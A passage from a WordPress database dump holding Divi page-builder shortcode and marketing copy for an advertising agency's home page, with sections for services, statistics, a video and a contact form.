body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-05 07:39:48','2020-08-05 07:39:48','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/05/134-revision-v1/',0,'revision','',0),(434,1,'2020-08-05 07:40:46','2020-08-05 07:40:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image 